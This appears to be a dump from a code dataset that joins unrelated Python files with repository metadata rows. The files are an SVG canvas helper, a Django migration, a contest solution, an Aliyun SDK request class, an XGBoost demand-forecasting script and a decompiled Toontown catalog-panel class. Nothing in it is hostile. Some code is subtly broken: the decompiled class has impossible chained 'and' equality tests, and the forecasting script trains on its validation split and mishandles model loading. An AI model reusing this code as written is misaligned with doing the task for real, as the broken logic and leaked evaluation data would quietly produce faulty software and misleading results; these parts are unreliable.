self._graphics.append(graphics.Line(*args, **kwargs))
return self._graphics[-1]
def add_oval(self, *args, **kwargs):
"""Adds a :py:class:`.Oval` to the canvas.
:param x: The x-coordinate of the Oval's bounding rectangle upper left corner.
:param y: The y-coordinate of the Oval's bounding rectangle upper left corner.
:param width: The bounding rectangle's width.
:param height: The bounding rectangle's height.
:param str fill_color: The Oval's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Oval in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Oval.
:rtype: :py:class:`.Oval`"""
self._graphics.append(graphics.Oval(*args, **kwargs))
return self._graphics[-1]
def add_polygon(self, *args, **kwargs):
"""Adds a :py:class:`.Polygon` to the canvas.
:param \*points: The alternating x and y values of the Polygon's\
corners.
:param str fill_color: The Polygon's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Polygon in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Polygon.
:rtype: :py:class:`.Polygon`"""
self._graphics.append(graphics.Polygon(*args, **kwargs))
return self._graphics[-1]
def add_text(self, *args, **kwargs):
"""Adds a :py:class:`.Text` to the canvas.
:param x: The Text's x location.
:param y: The Text's y location.
:param str text: The text to display.
:param font_size: The font size of the Text when displayed.
:param horizontal_align: The horizontal alignment of the Text. Acceptable\
values are ``left``, ``center`` (default) and ``right``.
:param vertical_align: The vertical alignment of the Text. Acceptable\
values are ``top``, ``middle`` (default) and ``bottom``.
:param str fill_color: Defaults to '#FFFFFF'.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: Defaults to 0.
:param str line_style: The line pattern. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: Defaults to '#000000'.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle), in degrees.
:param dict data: Any data to be associated with the Text.
:rtype: :py:class:`.Text`"""
self._graphics.append(graphics.Text(*args, **kwargs))
return self._graphics[-1]
def add_polyline(self, *args, **kwargs):
"""Adds a :py:class:`.Polyline` to the canvas.
:param \*points: The alternating x and y values of the Polyline's\
corners.
:param line_width: The width of the edge of the Polyline in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Polyline.
:rtype: :py:class:`.Polyline`"""
self._graphics.append(graphics.Polyline(*args, **kwargs))
return self._graphics[-1]
def save(self, path):
"""Saves the canvas to file as an SVG file.
:param str path: The location and filename to save to."""
with open(path, "w") as f:
f.write(self.to_svg())
to_svg = svg.generate_canvas_svg
"""Returns the SVG text of the canvas.
Any ``data`` attributes of the Graphics contained will be rendered as SVG
attributes.
:rtype: ``str``"""
| [
"[email protected]"
] | |
a585d4489cb8b4295cdbaa734255fddff64656b5 | 416f598c62277659f787a37d06f3ebc633a79d53 | /every_election/apps/organisations/migrations/0036_auto_20180606_1035.py | bfa7659c15a88e941da82db96db06e8575c0edfb | [] | no_license | chris48s/EveryElection | 53b6d807e97b2a8b9a943dedcc5ff6ecc65d20fc | 38192a075ae359b91e2aa352fb3886c6c93d3337 | refs/heads/master | 2021-01-22T19:49:15.898338 | 2018-08-17T09:11:42 | 2018-08-17T09:11:42 | 85,244,907 | 0 | 0 | null | 2017-03-16T21:53:29 | 2017-03-16T21:53:28 | null | UTF-8 | Python | false | false | 484 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-06 10:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organisations', '0035_rename_divset_constraint'),
]
operations = [
migrations.AlterModelOptions(
name='organisation',
options={'get_latest_by': 'start_date', 'ordering': ('official_name', '-start_date')},
),
]
| [
"[email protected]"
] | |
0216d00c4a0280404201ed358bfc7c240952ec5a | 0202d8faff21f24e468654b3da56ca16457ff5b3 | /entrant/abc133/abc133-c.py | a93b0c17761a620084c2519ce520de7d390fcc5d | [] | no_license | ryogoOkura/atcoder | a3d8d052c6424db26994444eca1ebaa3efbd3e21 | 2865b42bbdb50d83bf129fd868083c2363e92024 | refs/heads/master | 2021-06-24T06:07:32.290393 | 2021-01-02T13:39:24 | 2021-01-02T13:39:24 | 187,552,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | l,r=map(int,input().split())
if (l//2019) == (r//2019):
l,r=l%2019,r%2019
ans=2018
for i in range(l,r):
for j in range(i+1,r+1):
tmp=(i*j)%2019
if tmp<ans:
ans=tmp
print(ans)
else:
print(0)
| [
"[email protected]"
] | |
39ceb9d36775a75edf35014ee07e0ae39affc16f | f8f2536fa873afa43dafe0217faa9134e57c8a1e | /aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DescribeHanaRestoresRequest.py | 29b991a2c5cbecc928a581fe3e4ae75d2966a997 | [
"Apache-2.0"
] | permissive | Sunnywillow/aliyun-openapi-python-sdk | 40b1b17ca39467e9f8405cb2ca08a85b9befd533 | 6855864a1d46f818d73f5870da0efec2b820baf5 | refs/heads/master | 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 | NOASSERTION | 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null | UTF-8 | Python | false | false | 2,536 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeHanaRestoresRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DescribeHanaRestores','hbr')
self.set_protocol_type('https')
def get_VaultId(self):
return self.get_query_params().get('VaultId')
def set_VaultId(self,VaultId):
self.add_query_param('VaultId',VaultId)
def get_DatabaseName(self):
return self.get_query_params().get('DatabaseName')
def set_DatabaseName(self,DatabaseName):
self.add_query_param('DatabaseName',DatabaseName)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_PageSize(self):
return self.get_query_params().get('PageSize')
def set_PageSize(self,PageSize):
self.add_query_param('PageSize',PageSize)
def get_RestoreStatus(self):
return self.get_query_params().get('RestoreStatus')
def set_RestoreStatus(self,RestoreStatus):
self.add_query_param('RestoreStatus',RestoreStatus)
def get_RestoreId(self):
return self.get_query_params().get('RestoreId')
def set_RestoreId(self,RestoreId):
self.add_query_param('RestoreId',RestoreId)
def get_ClusterId(self):
return self.get_query_params().get('ClusterId')
def set_ClusterId(self,ClusterId):
self.add_query_param('ClusterId',ClusterId)
def get_PageNumber(self):
return self.get_query_params().get('PageNumber')
def set_PageNumber(self,PageNumber):
self.add_query_param('PageNumber',PageNumber)
def get_Token(self):
return self.get_query_params().get('Token')
def set_Token(self,Token):
self.add_query_param('Token',Token) | [
"[email protected]"
] | |
e7b2527e9d44eef72048f1bb2f0a78a12a668f9b | 77639380e2c33eee09179f372632bcb57d3f7e3f | /favorita/base_xgb_model.py | d550fd5b81efab514e96961f156451c648bd8a32 | [] | no_license | razmik/demand_forecast_walmart | b8f5c4aaa3cb6dccae102e4ca19f1131131a9f26 | 56292bfbeebc1d3d4962e3ee26d05be2aebd5f4c | refs/heads/master | 2023-01-22T12:30:18.129486 | 2020-08-10T10:44:12 | 2020-08-10T10:44:12 | 283,923,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,399 | py | """
Author: Rashmika Nawaratne
Date: 05-Aug-20 at 4:53 PM
"""
import pandas as pd
import numpy as np
from datetime import datetime
import time
import gc
from xgboost import XGBRegressor
from xgboost import Booster
import matplotlib.pyplot as plt
from favorita.load_data import Data
from favorita.evaluation import Evaluator
MODEL_NAME = 'base_xgb'
OUTPUT_FOLDER = 'model_outputs/' + MODEL_NAME
SELECTED_STORES = [i for i in range(1, 55)]
ONLY_EVALUATE = False
if __name__ == "__main__":
start_time = time.time()
data = Data()
end_time = time.time()
print("Load data in: {} mins.".format((end_time - start_time) / 60))
# Filter stores to reduce the dataset
data.train = data.train.loc[data.train.store_nbr.isin(SELECTED_STORES)]
# Feature Engineering
data.train['month'] = data.train['date'].dt.month
data.train['week'] = data.train['date'].dt.week
data.train['day'] = data.train['date'].dt.dayofweek
data.train['month'] = data.train['month'].astype('int8')
data.train['week'] = data.train['week'].astype('int8')
data.train['day'] = data.train['day'].astype('int8')
# Log transform the target variable (unit_sales)
data.train['unit_sales'] = data.train['unit_sales'].apply(lambda u: np.log1p(float(u)) if float(u) > 0 else 0)
# Merge tables
df_full = pd.merge(data.train, data.items[['item_nbr', 'perishable', 'family']],
on='item_nbr') # Train and items (perishable state)
df_full = pd.merge(df_full,
data.weather_oil_holiday[['date', 'store_nbr', 'is_holiday', 'AvgTemp', 'dcoilwtico_imputed']],
on=['date', 'store_nbr'], how='left') # Merge weather, oil and holiday
del df_full['id']
df_full.rename(columns={'dcoilwtico_imputed': 'oil_price', 'AvgTemp': 'avg_temp'}, inplace=True)
# Get test train split
df_train = df_full[(df_full['date'] > datetime(2017, 1, 1)) & (df_full['date'] < datetime(2017, 7, 12))]
df_valid = df_full[(df_full['date'] >= datetime(2017, 7, 12)) & (df_full['date'] < datetime(2017, 7, 31))]
df_test = df_full[df_full['date'] >= datetime(2017, 7, 31)]
# clean variables
del data
del df_full
gc.collect()
# Modeling
feature_columns = ['store_nbr', 'item_nbr', 'onpromotion', 'month', 'week', 'day', 'perishable', 'is_holiday',
'avg_temp', 'oil_price']
target_column = ['unit_sales']
X_train, Y_train = df_train[feature_columns], df_train[target_column]
X_valid, Y_valid = df_valid[feature_columns], df_valid[target_column]
X_test, Y_test = df_test[feature_columns], df_test[target_column]
print('Training dataset: {}'.format(X_train.shape))
print('Testing dataset: {}'.format(X_test.shape))
if not ONLY_EVALUATE:
# Default XGB
model_xgr_1 = XGBRegressor()
start_time = time.time()
model_xgr_1.fit(X_valid, Y_valid)
end_time = time.time()
print("Model Train time: {} mins.".format((end_time - start_time) / 60))
# Save model
model_xgr_1._Booster.save_model(OUTPUT_FOLDER + '.model')
else:
# Load from file
model_xgr_1 = Booster().load_model(OUTPUT_FOLDER + '.model')
Y_pred = model_xgr_1.predict(X_test)
# Get target variables back from log (antilog)
Y_pred_antilog = np.clip(np.expm1(Y_pred), 0, 1000)
Y_test_antilog = np.expm1(Y_test)
# Evaluation
weights = X_test["perishable"].values * 0.25 + 1
eval = Evaluator()
error_data = []
columns = ['Target unit', 'Data split', 'MSE', 'RMSE', 'NWRMSLE', 'MAE', 'MAPE']
mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg = eval.get_error(weights, Y_test, Y_pred, 1)
mse_val, rmse_val, nwrmsle_val, mae_val, mape_val = eval.get_error(weights, Y_test_antilog, Y_pred_antilog, 1)
error_data.append(['Log', 'Test', mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg])
error_data.append(['Unit', 'Test', mse_val, rmse_val, nwrmsle_val, mae_val, mape_val])
pd.DataFrame(error_data, columns=columns).to_csv(OUTPUT_FOLDER + '_evaluation.csv', index=False)
# Visualize
# plt.figure()
#
# plt.scatter(Y_test_antilog, Y_pred_antilog, color='blue')
# plt.xlabel("Unit Sales")
# plt.ylabel("Predicted Unit Sales")
# plt.title("Actual vs Predicted Unit Sales")
# plt.show()
| [
"[email protected]"
] | |
a3da9504f28fd24a09d5a381d01999f1ecc2ed4b | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/catalog/CatalogItemPanel.py | eec5dcc756b6e374f53146c1236fb2ebf461b5a8 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 29,895 | py | # File: t (Python 2.4)
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from toontown.toonbase import ToontownGlobals
from toontown.toontowngui import TTDialog
from toontown.toonbase import TTLocalizer
import CatalogItemTypes
import CatalogItem
from CatalogWallpaperItem import getAllWallpapers
from CatalogFlooringItem import getAllFloorings
from CatalogMouldingItem import getAllMouldings
from CatalogWainscotingItem import getAllWainscotings
from CatalogFurnitureItem import getAllFurnitures
from CatalogFurnitureItem import FLTrunk
from toontown.toontowngui.TeaserPanel import TeaserPanel
from otp.otpbase import OTPGlobals
from direct.directnotify import DirectNotifyGlobal
CATALOG_PANEL_WORDWRAP = 10
CATALOG_PANEL_CHAT_WORDWRAP = 9
CATALOG_PANEL_ACCESSORY_WORDWRAP = 11
class CatalogItemPanel(DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('CatalogItemPanel')
def __init__(self, parent = aspect2d, parentCatalogScreen = None, **kw):
optiondefs = (('item', None, DGG.INITOPT), ('type', CatalogItem.CatalogTypeUnspecified, DGG.INITOPT), ('relief', None, None))
self.parentCatalogScreen = parentCatalogScreen
self.defineoptions(kw, optiondefs)
DirectFrame.__init__(self, parent)
self.loaded = 0
self.initialiseoptions(CatalogItemPanel)
def load(self):
if self.loaded:
return None
self.loaded = 1
self.verify = None
self.pictureFrame = self.attachNewNode('pictureFrame')
self.pictureFrame.setScale(0.14999999999999999)
self.itemIndex = 0
self.ival = None
typeCode = self['item'].getTypeCode()
if self['item'].needsCustomize():
if typeCode == CatalogItemTypes.WALLPAPER_ITEM and typeCode == CatalogItemTypes.FLOORING_ITEM and typeCode == CatalogItemTypes.MOULDING_ITEM and typeCode == CatalogItemTypes.FURNITURE_ITEM and typeCode == CatalogItemTypes.WAINSCOTING_ITEM or typeCode == CatalogItemTypes.TOON_STATUE_ITEM:
if typeCode == CatalogItemTypes.WALLPAPER_ITEM:
self.items = getAllWallpapers(self['item'].patternIndex)
elif typeCode == CatalogItemTypes.FLOORING_ITEM:
self.items = getAllFloorings(self['item'].patternIndex)
elif typeCode == CatalogItemTypes.MOULDING_ITEM:
self.items = getAllMouldings(self['item'].patternIndex)
elif typeCode == CatalogItemTypes.FURNITURE_ITEM:
self.items = getAllFurnitures(self['item'].furnitureType)
elif typeCode == CatalogItemTypes.TOON_STATUE_ITEM:
self.items = self['item'].getAllToonStatues()
elif typeCode == CatalogItemTypes.WAINSCOTING_ITEM:
self.items = getAllWainscotings(self['item'].patternIndex)
self.numItems = len(self.items)
if self.numItems > 1:
guiItems = loader.loadModel('phase_5.5/models/gui/catalog_gui')
nextUp = guiItems.find('**/arrow_up')
nextRollover = guiItems.find('**/arrow_Rollover')
nextDown = guiItems.find('**/arrow_Down')
prevUp = guiItems.find('**/arrowUp')
prevDown = guiItems.find('**/arrowDown1')
prevRollover = guiItems.find('**/arrowRollover')
self.nextVariant = DirectButton(parent = self, relief = None, image = (nextUp, nextDown, nextRollover, nextUp), image3_color = (1, 1, 1, 0.40000000000000002), pos = (0.13, 0, 0), command = self.showNextVariant)
self.prevVariant = DirectButton(parent = self, relief = None, image = (prevUp, prevDown, prevRollover, prevUp), image3_color = (1, 1, 1, 0.40000000000000002), pos = (-0.13, 0, 0), command = self.showPrevVariant, state = DGG.DISABLED)
self.variantPictures = [
(None, None)] * self.numItems
else:
self.variantPictures = [
(None, None)]
self.showCurrentVariant()
else:
(picture, self.ival) = self['item'].getPicture(base.localAvatar)
if picture:
picture.reparentTo(self)
picture.setScale(0.14999999999999999)
self.items = [
self['item']]
self.variantPictures = [
(picture, self.ival)]
self.typeLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, 0.23999999999999999), scale = TTLocalizer.CIPtypeLabel, text = self['item'].getTypeName(), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getInterfaceFont(), text_wordwrap = CATALOG_PANEL_WORDWRAP)
self.auxText = DirectLabel(parent = self, relief = None, scale = 0.050000000000000003, pos = (-0.20000000000000001, 0, 0.16))
self.auxText.setHpr(0, 0, -30)
self.nameLabel = DirectLabel(parent = self, relief = None, text = self['item'].getDisplayName(), text_fg = (0, 0, 0, 1), text_font = ToontownGlobals.getInterfaceFont(), text_scale = TTLocalizer.CIPnameLabel, text_wordwrap = CATALOG_PANEL_WORDWRAP + TTLocalizer.CIPwordwrapOffset)
if self['item'].getTypeCode() == CatalogItemTypes.CHAT_ITEM:
self.nameLabel['text_wordwrap'] = CATALOG_PANEL_CHAT_WORDWRAP
numRows = self.nameLabel.component('text0').textNode.getNumRows()
if numRows == 1:
namePos = (0, 0, -0.059999999999999998)
elif numRows == 2:
namePos = (0, 0, -0.029999999999999999)
else:
namePos = (0, 0, 0)
nameScale = 0.063
elif self['item'].getTypeCode() == CatalogItemTypes.ACCESSORY_ITEM:
self.nameLabel['text_wordwrap'] = CATALOG_PANEL_ACCESSORY_WORDWRAP
namePos = (0, 0, -0.22)
nameScale = 0.059999999999999998
else:
namePos = (0, 0, -0.22)
nameScale = 0.059999999999999998
self.nameLabel.setPos(*namePos)
self.nameLabel.setScale(nameScale)
numericBeanPrice = self['item'].getPrice(self['type'])
priceStr = str(numericBeanPrice) + ' ' + TTLocalizer.CatalogCurrency
priceScale = 0.070000000000000007
if self['item'].isSaleItem():
priceStr = TTLocalizer.CatalogSaleItem + priceStr
priceScale = 0.059999999999999998
self.priceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, text = priceStr, text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ACenter)
self.createEmblemPrices(numericBeanPrice)
buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
upButton = buttonModels.find('**/InventoryButtonUp')
downButton = buttonModels.find('**/InventoryButtonDown')
rolloverButton = buttonModels.find('**/InventoryButtonRollover')
buyText = TTLocalizer.CatalogBuyText
buyTextScale = TTLocalizer.CIPbuyButton
if self['item'].isRental():
buyText = TTLocalizer.CatalogRentText
self.buyButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, 0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text = buyText, text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (1.0, 0.20000000000000001, 0.20000000000000001, 1), image0_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 1), image3_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 0.40000000000000002), command = self._CatalogItemPanel__handlePurchaseRequest)
soundIcons = loader.loadModel('phase_5.5/models/gui/catalogSoundIcons')
soundOn = soundIcons.find('**/sound07')
soundOff = soundIcons.find('**/sound08')
self.soundOnButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, -0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (0.20000000000000001, 0.5, 0.20000000000000001, 1), image0_color = Vec4(0.40000000000000002, 0.5, 0.40000000000000002, 1), image3_color = Vec4(0.40000000000000002, 0.5, 0.40000000000000002, 0.40000000000000002), command = self.handleSoundOnButton)
self.soundOnButton.hide()
soundOn.setScale(0.10000000000000001)
soundOn.reparentTo(self.soundOnButton)
self.soundOffButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, -0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (0.20000000000000001, 1.0, 0.20000000000000001, 1), image0_color = Vec4(0.40000000000000002, 1.0, 0.40000000000000002, 1), image3_color = Vec4(0.40000000000000002, 1.0, 0.40000000000000002, 0.40000000000000002), command = self.handleSoundOffButton)
self.soundOffButton.hide()
soundOff = self.soundOffButton.attachNewNode('soundOff')
soundOn.copyTo(soundOff)
soundOff.reparentTo(self.soundOffButton)
upGButton = buttonModels.find('**/InventoryButtonUp')
downGButton = buttonModels.find('**/InventoryButtonDown')
rolloverGButton = buttonModels.find('**/InventoryButtonRollover')
self.giftButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, 0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text = TTLocalizer.CatalogGiftText, text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (1.0, 0.20000000000000001, 0.20000000000000001, 1), image0_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 1), image3_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 0.40000000000000002), command = self._CatalogItemPanel__handleGiftRequest)
self.updateButtons()
def createEmblemPrices(self, numericBeanPrice):
priceScale = 0.070000000000000007
emblemPrices = self['item'].getEmblemPrices()
if emblemPrices:
if numericBeanPrice:
self.priceLabel.hide()
beanModel = loader.loadModel('phase_5.5/models/estate/jellyBean')
beanModel.setColorScale(1, 0, 0, 1)
self.beanPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = beanModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(numericBeanPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
else:
self.priceLabel.hide()
goldPrice = 0
silverPrice = 0
emblemIcon = loader.loadModel('phase_3.5/models/gui/tt_m_gui_gen_emblemIcons')
silverModel = emblemIcon.find('**/tt_t_gui_gen_emblemSilver')
goldModel = emblemIcon.find('**/tt_t_gui_gen_emblemGold')
if ToontownGlobals.EmblemTypes.Silver < len(emblemPrices):
silverPrice = emblemPrices[ToontownGlobals.EmblemTypes.Silver]
if silverPrice:
self.silverPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = silverModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(silverPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
if ToontownGlobals.EmblemTypes.Gold < len(emblemPrices):
goldPrice = emblemPrices[ToontownGlobals.EmblemTypes.Gold]
if goldPrice:
self.goldPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = goldModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(goldPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
numPrices = 0
if numericBeanPrice:
numPrices += 1
if silverPrice:
numPrices += 1
if goldPrice:
numPrices += 1
if numPrices == 2:
if not numericBeanPrice:
self.silverPriceLabel.setX(-0.14999999999999999)
self.goldPriceLabel.setX(0.14999999999999999)
if not silverPrice:
self.goldPriceLabel.setX(-0.14999999999999999)
self.beanPriceLabel.setX(0.14999999999999999)
if not goldPrice:
self.silverPriceLabel.setX(-0.14999999999999999)
self.beanPriceLabel.setX(0.14999999999999999)
elif numPrices == 3:
self.silverPriceLabel.setX(-0.20000000000000001)
self.goldPriceLabel.setX(0)
self.beanPriceLabel.setX(0.14999999999999999)
def showNextVariant(self):
messenger.send('wakeup')
self.hideCurrentVariant()
self.itemIndex += 1
if self.itemIndex >= self.numItems - 1:
self.itemIndex = self.numItems - 1
self.nextVariant['state'] = DGG.DISABLED
else:
self.nextVariant['state'] = DGG.NORMAL
self.prevVariant['state'] = DGG.NORMAL
self.showCurrentVariant()
def showPrevVariant(self):
messenger.send('wakeup')
self.hideCurrentVariant()
self.itemIndex -= 1
if self.itemIndex < 0:
self.itemIndex = 0
self.prevVariant['state'] = DGG.DISABLED
else:
self.prevVariant['state'] = DGG.NORMAL
self.nextVariant['state'] = DGG.NORMAL
self.showCurrentVariant()
def showCurrentVariant(self):
(newPic, self.ival) = self.variantPictures[self.itemIndex]
if self.ival:
self.ival.finish()
if not newPic:
variant = self.items[self.itemIndex]
(newPic, self.ival) = variant.getPicture(base.localAvatar)
self.variantPictures[self.itemIndex] = (newPic, self.ival)
newPic.reparentTo(self.pictureFrame)
if self.ival:
self.ival.loop()
if self['item'].getTypeCode() == CatalogItemTypes.TOON_STATUE_ITEM:
if hasattr(self, 'nameLabel'):
self.nameLabel['text'] = self.items[self.itemIndex].getDisplayName()
self['item'].gardenIndex = self.items[self.itemIndex].gardenIndex
def hideCurrentVariant(self):
currentPic = self.variantPictures[self.itemIndex][0]
if currentPic:
currentPic.detachNode()
def unload(self):
if not self.loaded:
DirectFrame.destroy(self)
return None
self.loaded = 0
if self['item'].getTypeCode() == CatalogItemTypes.TOON_STATUE_ITEM:
self['item'].deleteAllToonStatues()
self['item'].gardenIndex = self['item'].startPoseIndex
self.nameLabel['text'] = self['item'].getDisplayName()
self['item'].requestPurchaseCleanup()
for (picture, ival) in self.variantPictures:
if picture:
picture.destroy()
if ival:
ival.finish()
continue
self.variantPictures = None
if self.ival:
self.ival.finish()
self.ival = None
if len(self.items):
self.items[0].cleanupPicture()
self.pictureFrame.remove()
self.pictureFrame = None
self.items = []
if self.verify:
self.verify.cleanup()
DirectFrame.destroy(self)
def destroy(self):
self.parentCatalogScreen = None
self.unload()
def getTeaserPanel(self):
typeName = self['item'].getTypeName()
if typeName == TTLocalizer.EmoteTypeName or typeName == TTLocalizer.ChatTypeName:
page = 'emotions'
elif typeName == TTLocalizer.GardenTypeName or typeName == TTLocalizer.GardenStarterTypeName:
page = 'gardening'
else:
page = 'clothing'
def showTeaserPanel():
TeaserPanel(pageName = page)
return showTeaserPanel
def updateBuyButton(self):
if not self.loaded:
return None
if not base.cr.isPaid():
self.buyButton['command'] = self.getTeaserPanel()
self.buyButton.show()
typeCode = self['item'].getTypeCode()
orderCount = base.localAvatar.onOrder.count(self['item'])
if orderCount > 0:
if orderCount > 1:
auxText = '%d %s' % (orderCount, TTLocalizer.CatalogOnOrderText)
else:
auxText = TTLocalizer.CatalogOnOrderText
else:
auxText = ''
isNameTag = typeCode == CatalogItemTypes.NAMETAG_ITEM
if isNameTag and not (localAvatar.getGameAccess() == OTPGlobals.AccessFull):
if self['item'].nametagStyle == 100:
if localAvatar.getFont() == ToontownGlobals.getToonFont():
auxText = TTLocalizer.CatalogCurrent
self.buyButton['state'] = DGG.DISABLED
elif self['item'].getPrice(self['type']) > base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
self.buyButton['state'] = DGG.DISABLED
elif isNameTag and self['item'].nametagStyle == localAvatar.getNametagStyle():
auxText = TTLocalizer.CatalogCurrent
self.buyButton['state'] = DGG.DISABLED
elif self['item'].reachedPurchaseLimit(base.localAvatar):
max = self['item'].getPurchaseLimit()
if max <= 1:
auxText = TTLocalizer.CatalogPurchasedText
if self['item'].hasBeenGifted(base.localAvatar):
auxText = TTLocalizer.CatalogGiftedText
else:
auxText = TTLocalizer.CatalogPurchasedMaxText
self.buyButton['state'] = DGG.DISABLED
elif hasattr(self['item'], 'noGarden') and self['item'].noGarden(base.localAvatar):
auxText = TTLocalizer.NoGarden
self.buyButton['state'] = DGG.DISABLED
elif hasattr(self['item'], 'isSkillTooLow') and self['item'].isSkillTooLow(base.localAvatar):
auxText = TTLocalizer.SkillTooLow
self.buyButton['state'] = DGG.DISABLED
elif hasattr(self['item'], 'getDaysToGo') and self['item'].getDaysToGo(base.localAvatar):
auxText = TTLocalizer.DaysToGo % self['item'].getDaysToGo(base.localAvatar)
self.buyButton['state'] = DGG.DISABLED
elif self['item'].getEmblemPrices() and not base.localAvatar.isEnoughMoneyAndEmblemsToBuy(self['item'].getPrice(self['type']), self['item'].getEmblemPrices()):
self.buyButton['state'] = DGG.DISABLED
elif self['item'].getPrice(self['type']) <= base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
self.buyButton['state'] = DGG.NORMAL
self.buyButton.show()
else:
self.buyButton['state'] = DGG.DISABLED
self.buyButton.show()
self.auxText['text'] = auxText
def _CatalogItemPanel__handlePurchaseRequest(self):
if self['item'].replacesExisting() and self['item'].hasExisting():
if self['item'].getFlags() & FLTrunk:
message = TTLocalizer.CatalogVerifyPurchase % {
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
else:
message = TTLocalizer.CatalogOnlyOnePurchase % {
'old': self['item'].getYourOldDesc(),
'item': self['item'].getName(),
'price': self['item'].getPrice(self['type']) }
elif self['item'].isRental():
message = TTLocalizer.CatalogVerifyRent % {
